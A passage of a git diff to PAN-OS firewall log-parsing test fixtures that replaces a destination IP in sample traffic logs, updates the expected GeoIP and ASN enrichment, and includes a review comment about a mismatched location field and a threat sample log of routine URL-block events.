"192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "panw": { "panos": { "ruleset": "rule1", @@ -13653,7 +13694,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "community_id": "1:g+OW2rFxOQFbjQiQ/fw145Cfric=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -13691,14 +13732,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284409018Z",
- "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
+ "ingested": "2021-12-09T13:43:22.382150400Z",
+ "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
 "created": "2012-10-30T09:46:42.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -13721,27 +13762,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 0,
- "ip": "204.232.231.46",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": {
@@ -13760,7 +13800,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -13794,7 +13834,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=",
+ "community_id": "1:iXmhRxdINxEmOXTjxHfTv8gVn1o=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4",
@@ -13832,14 +13872,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284413692Z",
- "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.382155700Z",
+ "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:42.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json
index c4462133e3c..d41d8818ef9 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json
@@ -12,7 +12,7 @@
 "pan-os",
 "forwarded"
 ],
- "message": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0"
+ "message": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0"
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
index 0e9e7d19607..f827ed55787 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
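Review bot: The new `+ "message"` line swaps the destination IP to `175.16.199.1` but leaves the destination-location column untouched — the `United States` right after `192.168.0.0-192.168.255.255`, which appears to be the PAN-OS dstloc field — so the sample now describes an address that GeoIP places in Jilin, China as being in the United States. The regenerated expected file for this input carries both claims in one object: `"country_name": "China"` from the enrichment and `"name": "United States"` from the log. Unless the intent is to pin that `destination.geo.name` mirrors the firewall's own value rather than the lookup, change that column to `China` in the new message and regenerate the expected output; if the mismatch is intended, a one-line comment in the test's documentation saying so would stop the next reader from filing it as a parser bug.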
@@ -10,27 +10,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
 "bytes": 0,
- "ip": "204.232.231.46",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": {
@@ -49,7 +48,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -83,7 +82,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=",
+ "community_id": "1:yr/t+D7vuUqVI0fdtRb/nP4gu7g=",
 "transport": "tcp",
 "application": "web-browsing",
 "type": "ipv4",
@@ -121,14 +120,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:39:10.095239550Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:44.429582400Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log
index 2b6854cf5a5..2c3b2c1917b 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log
@@ -1,76 +1,76 @@ -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 
16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United 